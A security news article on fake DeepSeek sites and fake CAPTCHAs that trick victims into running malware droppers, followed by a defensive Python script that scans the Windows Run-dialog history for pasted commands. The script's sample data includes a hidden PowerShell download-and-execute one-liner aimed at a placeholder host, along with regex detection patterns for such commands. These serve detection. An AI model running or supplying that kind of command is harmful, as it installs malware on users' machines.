- McAfee’s researchers find a “cocktail” of malware hiding behind fake DeepSeek apps
- The campaign preys on people searching for the generative AI tool
- Infostealers, cryptominers and more are delivered this way
The hype around DeepSeek is the next big thing cybercriminals are exploiting in their campaigns, say researchers from McAfee Labs.
The team outlined how it saw cybercriminals set up various sites offering different versions of DeepSeek for download. Victims reached these sites through search engines, which means some SEO poisoning was also involved in the campaign.
When they reach the websites and download the software, the victims are infected with a “cocktail of malware”, ranging from keyloggers and password stealers to cryptominers. These malware variants can steal sensitive information (including banking details and cryptocurrency wallet information) and can force the infected computer to mine cryptocurrency, making it useless for virtually everything else.
Fake CAPTCHA
While on some sites the victims are invited to download a DeepSeek app or program, on others the devil is in the CAPTCHA.
In some cases observed by McAfee, the victims would visit a site with a CAPTCHA that can be “solved” by copying a command and pasting it into the Run dialog on Windows. This command downloads and runs a malware dropper.
To stay safe, be vigilant at all times. Instead of googling for something, visit the site directly, and if you do not know the address, examine each link returned by the search engine.
Furthermore, a real CAPTCHA will never ask you to paste a command into the Run dialog.
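The pasted-command trick described above leaves a trace: Windows keeps the history of what was typed into the Run dialog. The following script is an added example, not code from the McAfee write-up; it assumes that history lives in the standard RunMRU registry key, uses an assumed list of download-and-execute indicators, and ships with constructed sample entries so it also runs off-Windows.

```python
import re
import sys
# Heuristic indicators of a pasted download-and-execute one-liner (assumed list, not from the write-up).
INDICATORS = {
    "remote_url": re.compile(r"https?://", re.I),
    "download_cmdlet": re.compile(r"\b(Invoke-WebRequest|iwr|DownloadString|DownloadFile|curl|wget)\b", re.I),
    "hidden_or_bypass": re.compile(r"-(w(indowstyle)?\s+hidden|ep\s+bypass|ExecutionPolicy\s+bypass|enc(odedcommand)?)\b", re.I),
    "eval": re.compile(r"\b(iex|Invoke-Expression)\b", re.I),
}

def classify(command: str) -> list[str]:
    """Names of the indicators matched by one Run-dialog command."""
    return [name for name, rx in INDICATORS.items() if rx.search(command)]

def audit(entries: dict[str, str]) -> list[tuple[str, str, list[str]]]:
    """Flag entries matching two or more indicators (a bare URL alone is normal use)."""
    findings = []
    for name, raw in entries.items():
        cmd = raw[:-2] if raw.endswith("\\1") else raw  # RunMRU appends "\1" to each command
        hits = classify(cmd)
        if len(hits) >= 2:
            findings.append((name, cmd, hits))
    return findings

def read_runmru() -> dict[str, str]:
    """Read the live Run history (Windows only). MRUList is the ordering, not a command."""
    import winreg  # standard library, Windows only
    path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
    entries, i = {}, 0
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
        while True:
            try:
                name, value, _ = winreg.EnumValue(key, i)
            except OSError:  # no more values
                return entries
            if name != "MRUList":
                entries[name] = value
            i += 1

# Constructed sample history (not real telemetry): a benign program, a pasted "CAPTCHA" command, a plain URL.
SAMPLE = {
    "a": "notepad\\1",
    "b": 'powershell -w hidden -c "iex (iwr http://example.invalid/x)"\\1',
    "c": "https://example.invalid/\\1",
}

if __name__ == "__main__":  # live audit on Windows, constructed sample elsewhere
    for name, cmd, hits in audit(read_runmru() if sys.platform == "win32" else SAMPLE):
        print(f"[{name}] {cmd}  <-- {', '.join(hits)}")
```

Only entry "b" is reported; the plain URL in "c" matches a single indicator and stays below the threshold, which keeps ordinary Run-dialog use out of the findings.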
Hackers are known for tapping into current trends to distribute malware. Similar campaigns were observed when ChatGPT was first released, for both Windows and Android.
Big events such as Black Friday and Cyber Monday, the Olympic Games, the World Cup and others have all been abused in the past. The Covid-19 outbreak, the Russo-Ukrainian war and the US presidential election all served as platforms for information theft, malware distribution and wire fraud.